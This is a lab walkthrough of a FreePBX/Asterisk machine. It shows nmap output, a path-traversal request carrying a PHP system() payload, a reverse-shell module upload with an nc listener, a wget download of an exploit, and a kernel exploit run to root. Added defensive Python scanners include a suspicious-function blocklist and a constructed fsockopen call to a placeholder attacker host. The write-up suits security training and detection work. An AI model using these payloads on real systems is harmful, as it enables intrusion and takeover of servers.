# VHL — PBX

Misc · Medium · Linux

FreePBX/Asterisk VoIP server on Ubuntu. Exploited FreePBX RCE CVE via the admin panel to gain a reverse shell and escalate.

February 14, 2025 · Virtual Hacking Labs

#FreePBX #Asterisk #VoIP #RCE

## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-14 14:57 EST
Nmap scan report for 10.11.1.17
Host is up (0.025s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 53:c1:71:52:3e:c3:9c:8d:e1:70:3f:14:e7:73:09:fa (DSA)
| 2048 61:67:5a:d2:d9:ee:12:00:70:ef:61:ac:09:85:e3:2c (RSA)
| 256 fc:07:b3:93:03:9e:3d:54:84:f7:ed:41:3d:ca:54:d0 (ECDSA)
|_ 256 4e:53:a1:92:2f:fb:dc:43:4a:b1:39:89:9d:4c:4d:b9 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
| http-title: 404 Not Found
|_Requested resource was config.php
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE SASL PIPELINING STLS TOP UIDL CAPA RESP-CODES
| ssl-cert: Subject: commonName=pbx/organizationName=Dovecot mail server
| Not valid before: 2016-10-06T11:26:13
|_Not valid after: 2026-10-06T11:26:13
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: LOGINDISABLEDA0001 SASL-IR STARTTLS LOGIN-REFERRALS ENABLE capabilities have IDLE listed more post-login LITERAL+ Pre-login ID IMAP4rev1 OK
| ssl-cert: Subject: commonName=pbx/organizationName=Dovecot mail server
| Not valid before: 2016-10-06T11:26:13
|_Not valid after: 2026-10-06T11:26:13
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: AUTH=PLAINA0001 listed LOGIN-REFERRALS ENABLE capabilities have IDLE Pre-login more post-login LITERAL+ SASL-IR ID IMAP4rev1 OK
| ssl-cert: Subject: commonName=pbx/organizationName=Dovecot mail server
| Not valid before: 2016-10-06T11:26:13
|_Not valid after: 2026-10-06T11:26:13
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=pbx/organizationName=Dovecot mail server
| Not valid before: 2016-10-06T11:26:13
|_Not valid after: 2026-10-06T11:26:13
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: AUTH-RESP-CODE SASL(PLAIN) PIPELINING CAPA TOP UIDL USER RESP-CODES
5038/tcp open asterisk Asterisk Call Manager 2.8.0
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1
Network Distance: 2 hops
Service Info: Host: PBX; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-02-14T19:57:44
|_ start_date: N/A
| smb2-security-mode:
| 3:0:0:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: PBX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: -19m58s, deviation: 34m38s, median: 1s
| smb-os-discovery:
| OS: Unix (Samba 4.1.6-Ubuntu)
| Computer name: pbx
| NetBIOS computer name: PBX\x00
| Domain name:
| FQDN: pbx
|_ System time: 2025-02-14T20:57:44+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 24.73 ms 10.11.1.17
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.14 seconds
```

## 80

```sh
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
| http-title: 404 Not Found
|_Requested resource was config.php
```

### default credentials

`root:root`

```sh
curl "http://10.11.1.17/admin/ajax.php" -H "Host: 10.11.1.17" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://10.11.1.17/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=6ve5b92bku7mk4hc5sbc60jhr3" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time=%2B1 week&destination=/../../../../../../var/www/html/0x4148.php&language=<?php system('uname -a;id');?>"
{"error":{"type":"Exception","message":"Attempted to load Hotelwakeup with a hint of \/var\/www\/html\/admin\/modules\/hotelwakeup\/Hotelwakeup.class.php and it didn't exist","file":"\/var\/www\/html\/admin\/libraries\/BMO\/Self_Helper.class.php","line":161}}
```
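The ajax.php request above carries a traversal path in `destination` and a PHP payload in `language`; on this box the hotelwakeup module was not installed, so it errored out, but the request is a good specimen for detection. The following Python request inspector is an added example (not from the writeup or the FreePBX project): it decodes each form parameter, including repeated percent-encoding and backslash variants that go beyond the single request shown, and flags values that contain a directory-traversal sequence or a PHP open tag. The sample bodies are constructed; the first is the writeup's request, the second is an assumed benign call to the same endpoint.

```python
"""Flag path-traversal and PHP-injection attempts in form-encoded request bodies.

Added example, not from the writeup or the FreePBX project. It decodes each
parameter (including repeated percent-encoding) and reports values that
contain directory-traversal sequences or a PHP open tag. The sample bodies
are constructed: the first is the ajax.php request from the writeup, the
second is an assumed benign call to the same endpoint.
"""
import re
from urllib.parse import unquote, unquote_plus

# "../" or "..\" anywhere in the value, or a bare ".." path component.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# "<?php" or the short echo tag "<?=".
PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)

SAMPLE_BODIES = {
    "writeup": (
        "module=hotelwakeup&command=savecall&day=now&time=%2B1 week"
        "&destination=/../../../../../../var/www/html/0x4148.php"
        "&language=<?php system('uname -a;id');?>"
    ),
    # Assumed benign: destination is an extension number, language a locale.
    "benign": "module=hotelwakeup&command=savecall&day=now&time=%2B1 week"
              "&destination=1001&language=en_US",
}


def parse_form(body):
    """Split an application/x-www-form-urlencoded body into (name, value) pairs.

    Splitting on '&' by hand keeps ';' inside values (as in the PHP payload)
    from being treated as a separator.
    """
    pairs = []
    for field in body.split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding so %252e%252e%252f is seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_body(body):
    """Return [(parameter, reason), ...] for every suspicious parameter value."""
    findings = []
    for name, raw in parse_form(body):
        value = decode_fully(raw)
        if TRAVERSAL.search(value):
            findings.append((name, "path traversal"))
        if PHP_TAG.search(value):
            findings.append((name, "php tag"))
    return findings


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(label, inspect_body(body) or "clean")
```

Run it against POST bodies to `/admin/ajax.php` captured at a reverse proxy or WAF; the point is to decode before matching, since a single-pass rule is bypassed by double-encoding. The same two checks are what an application-side validator should apply before a parameter is ever joined into a filesystem path.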
### upload reverse shell module

- https://github.com/SamSepiolProxy/FreePBX-Reverse-Shell-Module/tree/master
```sh
cp /usr/share/webshells/php/php-reverse-shell.php ./
```

```sh
mkdir shell
mv module.xml install.php ./shell
tar -cvzf shell-1.0.tar.gz shell
shell/
shell/module.xml
shell/install.php
```
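A module archive like the one packaged above is just a tarball with `module.xml` and PHP files, and the installer runs whatever PHP it contains. The Python scanner below is an added example (not from the writeup or the FreePBX project) showing the check a defender can run on a module archive before it is installed: it opens the tarball in memory and reports PHP members that call command-execution or raw-socket functions. The archive, its minimal `module.xml`, and both installer files are constructed for the demonstration; `ATTACKER_HOST` is a placeholder.

```python
"""Scan a module tarball for PHP calls an installer should not need.

Added example, not from the writeup or the FreePBX project. The archive is
built in memory from constructed files; ATTACKER_HOST is a placeholder.
"""
import io
import re
import tarfile

# PHP functions with no legitimate use in a module installer.
SUSPICIOUS_CALLS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|fsockopen|pcntl_exec)\s*\(",
    re.IGNORECASE,
)

# Constructed, minimal module descriptor.
MODULE_XML = "<module>\n  <rawname>shell</rawname>\n  <name>shell</name>\n  <version>1.0</version>\n</module>\n"

# Constructed installer that only sets a value: nothing to report.
BENIGN_INSTALL = "<?php\n// constructed: only touches module settings\n$settings = ['greeting' => 'hello'];\n"

# Constructed installer that opens a socket and runs a command: both flagged.
MALICIOUS_INSTALL = (
    "<?php\n// constructed: no installer needs either of these calls\n"
    "$s = fsockopen('ATTACKER_HOST', 4444);\n"
    "shell_exec('id');\n"
)


def build_sample_module(install_php):
    """Build an in-memory shell-1.0.tar.gz holding module.xml and install.php."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in (("shell/module.xml", MODULE_XML), ("shell/install.php", install_php)):
            data = text.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def scan_module(archive_bytes):
    """Return {member_name: [function, ...]} for PHP members with suspicious calls."""
    hits = {}
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.endswith(".php"):
                continue
            source = tar.extractfile(member).read().decode("utf-8", "replace")
            found = sorted({m.group(1).lower() for m in SUSPICIOUS_CALLS.finditer(source)})
            if found:
                hits[member.name] = found
    return hits


if __name__ == "__main__":
    print("benign:", scan_module(build_sample_module(BENIGN_INSTALL)) or "clean")
    print("malicious:", scan_module(build_sample_module(MALICIOUS_INSTALL)))
```

The function list is a starting point, not a complete blocklist; the check is cheap enough to run on every upload, and any hit on an installer is worth a manual read regardless of what the module claims to do.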


```sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.17] 56648
Linux pbx 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
02:15:50 up 5:18, 0 users, load average: 0.00, 0.02, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
asterisk
```

## 5038

```sh
5038/tcp open asterisk Asterisk Call Manager 2.8.0
Device type: general purpose
```

## 445

```sh
445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
```

### rpcclient

```sh
samrdump.py 10.11.1.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Retrieving endpoint list from 10.11.1.17
Found domain(s):
. PBX
. Builtin
[*] Looking up users in domain PBX
Found user: pbx, uid = 1000
pbx (1000)/FullName: pbx
pbx (1000)/AdminComment:
pbx (1000)/UserComment:
pbx (1000)/PrimaryGroupId: 513
pbx (1000)/BadPasswordCount: 0
pbx (1000)/LogonCount: 0
pbx (1000)/PasswordLastSet: 2016-10-06 10:35:53
pbx (1000)/PasswordDoesNotExpire: False
pbx (1000)/AccountIsDisabled: False
pbx (1000)/ScriptPath:
[*] Received one entry.
```

```sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.16.0-30-generic (buildd@kissel) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #40~14.04.1-Ubuntu SMP Thu Jan 15 17:43:14 UTC 2015
Distributor ID: Ubuntu
Description: Ubuntu 14.04.2 LTS
Release: 14.04
Codename: trusty
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.9p5

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
* * * * * [ -x /var/www/html/admin/modules/dashboard/scheduler.php ] && /var/www/html/admin/modules/dashboard/scheduler.php
31 * * * * /var/lib/asterisk/bin/freepbx-cron-scheduler.php

╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii g++ 4:4.8.2-1ubuntu6 amd64 GNU C++ compiler
ii g++-4.8 4.8.4-2ubuntu1~14.04.3 amd64 GNU C++ compiler
ii gcc 4:4.8.2-1ubuntu6 amd64 GNU C compiler
ii gcc-4.8 4.8.4-2ubuntu1~14.04.3 amd64 GNU C compiler
/usr/bin/gcc
```

```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

```sh
asterisk@pbx:/home/asterisk$ wget http://172.16.1.1/37292.c
```

## priv esc

### kernel

- https://www.exploit-db.com/exploits/37292

Linux 3.16.0-30-generic

```sh
asterisk@pbx:/home/asterisk$ gcc 37292.c -o 37292
gcc 37292.c -o 37292
asterisk@pbx:/home/asterisk$ ./37292
./37292
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root
```